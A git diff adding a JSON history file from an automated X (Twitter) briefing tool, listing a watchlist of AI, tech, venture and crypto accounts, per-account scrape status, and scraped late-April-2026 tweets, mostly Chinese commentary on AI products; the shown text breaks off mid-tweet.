@GoSailGlobal | 2026-04-29T08:40:18+00:00\n - R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆 可下载本地软件(最好下载本地) or 网页版使用\n - https://x.com/GoSailGlobal/status/2049408421167005763\n- @GoSailGlobal | 2026-04-29T08:40:14+00:00\n - 被一个二维码拉进了一个 IM 内测群 群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题 agent 先梳调性,再列大纲,真人在旁边补刀 我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好…\n - https://x.com/GoSailGlobal/status/2049408403240571320\n- @Pluvio9yte | 2026-04-29T08:20:26+00:00\n - 兄弟们,搞3D的直接冲🤩🤩🤩 Claude上线了Blender MCP连接器, 自然语言直接操控Blender的Python API, 调场景、批量改物体、写自定义工具,不用会一行代码, 我之前在Blender写个批量脚本至少折腾半小时, 现在一句话就搞定了, 更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商, 这波是总共9个创意工具连…\n - https://x.com/Pluvio9yte/status/2049403423813140571\n- @runes_leo | 2026-04-29T08:16:00+00:00\n - 刚学习完罗福莉老师这场 3.5h 访谈发了中文解读, 转头就刷到她团队在送 100T tokens grant,立马提交申请。 表单做得对中文 builder 极友好: 工具栏 OpenClaw / Claude Code / Codex 排前三 模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产 下一步:把 …\n - https://x.com/runes_leo/status/2049402305217241384\n- @CuiMao | 2026-04-29T07:55:14+00:00\n - Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n - https://x.com/CuiMao/status/2049397079177592925\n- @CuiMao | 2026-04-29T07:44:33+00:00\n - x.com/i/article/204921670329…\n - https://x.com/CuiMao/status/2049394392776290573\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260501_013654.json b/data/x_brief/history/20260501_013654.json new file mode 100644 index 0000000..83fbb12 --- /dev/null +++ b/data/x_brief/history/20260501_013654.json @@ -0,0 +1,5460 @@ +{ + "generated_at": "2026-05-01T01:28:40.335641+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": "Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + "name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 492 + }, + "period": { + "days": 7, + "start_utc": "2026-04-24T01:27:32.545816+00:00", + "end_utc": "2026-05-01T01:28:40.335641+00:00", + "month_tag": "202605" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 35, + "total_tweets": 492, + "failed_accounts": 2, + "source_hits": { + "nitter": 41 + }, + "source_errors": { + "snscrape": 2, + "nitter": 2, + "rsshub": 2 + }, + "tweets_kept": 12 + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 5, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 14, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 15, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "artificial goblin intelligence\n\nachieved", + "url": "https://x.com/sama/status/2050021650641695108", + "published_at": "2026-05-01T01:17:03+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?", + "url": "https://x.com/GaryMarcus/status/2050020685733564459", + "published_at": "2026-05-01T01:13:13+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Most evil person in AI", + "url": "https://x.com/GaryMarcus/status/2050020164612104604", + "published_at": "2026-05-01T01:11:09+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", + "url": "https://x.com/GaryMarcus/status/2050019713409814672", + "published_at": "2026-05-01T01:09:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "😂😂😂@ATLHawks", + "url": "https://x.com/jason/status/2050018446616797370", + "published_at": "2026-05-01T01:04:19+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "We’re finally signing. https://www.bizjournals.com/sanjose/news/2017/06/24/vcs-rally-around-decency-pledge-after-silicon.html", + "url": "https://x.com/pmarca/status/2050017717592510568", + "published_at": "2026-05-01T01:01:26+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you are left with massive stranded capacity.\n\nGetting that balance right, years in advance, is incredibly hard.\" @rodriscoll\n\nLove to hear your thoughts @AnjneyMidha @JonathanRoss321 @mmurph @YasminRazavi @andrewdfeldman", + "url": "https://x.com/HarryStebbings/status/2050016099606118504", + "published_at": "2026-05-01T00:55:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", + "url": "https://x.com/berryxia/status/2050015406140903487", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", + "url": "https://x.com/berryxia/status/2050015402647027808", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "No comment", + "url": "https://x.com/jason/status/2050011874989649946", + "published_at": "2026-05-01T00:38:13+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Whoever is running the hawks social is a savage 😂", + "url": "https://x.com/jason/status/2050011821914865685", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 skill 全围绕代码。\n我这边是独立构建者全栈,skill 涵盖内容、量化、视频、社群。\n\n两套都对,服务不同的人。\n\n试试今晚 grep 一下 .claude/skills/,\n看哪些真在用、哪些只是占着位置 👀", + "url": "https://x.com/runes_leo/status/2050011821352829116", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Tokenmaxxing is stupid. \n\nChange my mind?", + "url": "https://x.com/GaryMarcus/status/2050009144846119068", + "published_at": "2026-05-01T00:27:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Image", + "url": "https://x.com/jason/status/2050009016105930837", + "published_at": "2026-05-01T00:26:51+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Apocalypses (apocalypsii?) are fungible.", + "url": "https://x.com/pmarca/status/2050007800882122833", + "published_at": "2026-05-01T00:22:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", + "url": "https://x.com/jason/status/2050007416964591880", + "published_at": "2026-05-01T00:20:30+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: $AAPL CFO:\n\n“Leading AI developers like Perplexity are choosing Mac as their preferred platform to build enterprise-grade AI assistants that power autonomous agents and boost workplace productivity.”", + "url": "https://x.com/AravSrinivas/status/2050007015616135365", + "published_at": "2026-05-01T00:18:54+00:00", + "source": "nitter", + "title_zh": "苹果公司CFO在回复中表示,行业领先的AI开发者正将Mac作为首选平台构建企业级人工智能助手,该技术可驱动自主代理系统并提升职场生产力。" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning. https://nypost.com/2026/04/30/business/inside-the-ai-doom-machine-and-who-is-benefiting-from-it/", + "url": "https://x.com/pmarca/status/2050004538216886756", + "published_at": "2026-05-01T00:09:03+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", + "url": "https://x.com/berryxia/status/2050004383971282952", + "published_at": "2026-05-01T00:08:27+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Grok Imagine 迄今为止最重大的升级。", + "url": "https://x.com/berryxia/status/2050002308759695561", + "published_at": "2026-05-01T00:00:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆与长期记忆等各类信息。\n\n5. 监控层 Monitoring\n至关重要的一环,用来实时追踪智能体执行的每一个步骤。\n\n6. 可靠性与故障管理 Reliability & failure management\n自动识别错误、执行重试、设置降级兜底策略,并支持人工介入处理。\n\n7. 治理与安全 Governance and security\n包含合规校验、行为审计、身份授权、数据安全等管控机制。", + "url": "https://x.com/berryxia/status/2050001371307646977", + "published_at": "2026-04-30T23:56:28+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", + "url": "https://x.com/berryxia/status/2049998972484567491", + "published_at": "2026-04-30T23:46:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "wow. incredible.", + "url": "https://x.com/GaryMarcus/status/2049998902452183488", + "published_at": "2026-04-30T23:46:40+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "你看看大模型有多重?\n这个挺有意思的😂", + "url": "https://x.com/berryxia/status/2049997574229446812", + "published_at": "2026-04-30T23:41:23+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "this is … odd. \n\nthe whole problem with agentic code is that people wind up with hard to debug redundancies, security holes, deleted databases, etc., which is exactly why you need roadmaps and code reviews, with AI-written code. \n\nI am with @Grady_Booch on this one (and almost everything else).\n\nI don’t doubt that we will have more code written cheaper than ever, but a lot of it is going to be a mess unless there is serious oversight. (Companies like Amazon have already seen this.)", + "url": "https://x.com/GaryMarcus/status/2049996377678057717", + "published_at": "2026-04-30T23:36:38+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude& Blender 🐮🍺", + "url": "https://x.com/berryxia/status/2049995723580850235", + "published_at": "2026-04-30T23:34:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Very quiet @ATLHawks 🤫", + "url": "https://x.com/jason/status/2049994885185384483", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护数据链路。个人知识库一般抓取互联网信息,而团队知识库则必须同步企业内部数据。\n\n3. Source Trust 来源可信度分级\n\n并非所有信息都具备同等价值。来源可信度可以帮助AI代理和人类区分官方已定决策与聊天记录中的个人观点。如果缺失这项能力,所有文档权重完全一致,最终会导致所有信息都失去参考意义。\n\n4. Freshness Monitoring 时效性监控\n\n主动复核知识库中存储的所有信息。当不同资料出现内容冲突时,系统会自动标记矛盾点,并降低过时信息的权重。它无需等待人工发现问题,完美解决了人类习惯性拖延信息维护的痛点。\n\n5. Self-Maintaining 自主维护\n\n文档能够随着工作进展自动更新。会议中敲定的决议会自动归档至对应文档,路线图的变更会同步扩散到所有相关位置。告别手动复制粘贴,也不再需要依赖“找人来更新文档”。\n\n6. Knowledge Drift 知识漂移\n\n指文档记录的信息与现实真实情况之间,缓慢且隐蔽产生的信息偏差。\n决议被推翻、工作流程变更、新功能上线,但相关文档却一成不变。往往直到AI代理给出错误答案时,人们才会察觉问题。知识漂移是知识库的通病,而上面五项技术正是对应的解决方案。\n补充问答翻译", + "url": "https://x.com/berryxia/status/2049994885764419789", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", + "url": "https://x.com/jason/status/2049994707061911758", + "published_at": "2026-04-30T23:29:59+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", + "url": "https://x.com/berryxia/status/2049993558577619280", + "published_at": "2026-04-30T23:25:26+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", + "url": "https://x.com/berryxia/status/2049992598639755395", + "published_at": "2026-04-30T23:21:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", + "url": "https://x.com/berryxia/status/2049992087547130254", + "published_at": "2026-04-30T23:19:35+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", + "url": "https://x.com/berryxia/status/2049991672155750500", + "published_at": "2026-04-30T23:17:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过 